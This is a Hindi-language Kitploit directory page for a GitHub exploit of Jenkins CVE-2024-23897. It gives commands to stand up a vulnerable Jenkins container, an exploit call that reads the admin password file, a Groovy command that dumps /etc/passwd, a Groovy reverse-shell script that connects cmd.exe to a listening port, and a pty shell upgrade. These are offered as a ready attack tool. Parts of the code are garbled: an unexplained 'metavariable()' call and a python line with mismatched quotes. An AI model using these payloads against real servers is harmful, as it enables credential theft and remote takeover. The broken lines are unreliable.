Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Exploit-CVE-2024-23897 — CVE-2024-23897 के लिए Jenkins में शोषण, जो तैयार किए गए अनुरोधों के माध्यम से फ़ाइल पढ़ने और रिमोट कोड निष्पादन को सक्षम करता है। इसमें RCE के लिए Docker सेटअप और Groovy स्क्रिप्ट शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/aadi0258/exploit-cve-2024-23897
भेद्यता विश्लेषणशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूल
GitHubaadi0258/exploit-cve-2024-23897

Exploit-CVE-2024-23897

CVE-2024-23897 के लिए Jenkins में शोषण, जो तैयार किए गए अनुरोधों के माध्यम से फ़ाइल पढ़ने और रिमोट कोड निष्पादन को सक्षम करता है। इसमें RCE के लिए Docker सेटअप और Groovy स्क्रिप्ट शामिल हैं।

रिपॉजिटरी देखें
210 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Exploit-CVE-2024-23897

कंटेनर चलाएँ

docker run -p 8080:8080 --name vulnerable-jenkins -d jenkins/jenkins:2.441-jdk17

लॉग जाँचें

docker logs <machine_name>

डॉकर मशीन का IP प्राप्त करें:

docker inspect vulnerable-jenkins | grep IPAddress

#शोषण कोड: python3 exploit.py --target http://127.0.0.1:8080 --file /var/jenkins_home/secrets/initialAdminPassword --request-timeout 30

ग्रूवी स्क्रिप्ट:

println "cat /etc/passwd".execute().text

RCE

String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(metavariable()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

पर्यावरणीय चर सेट करने के लिए

export TERM=xterm

#इंटरैक्टिव शेल के लिए

python -c 'import pty'; pty.spawn("/bin/bash")'

टूल डाउनलोड करें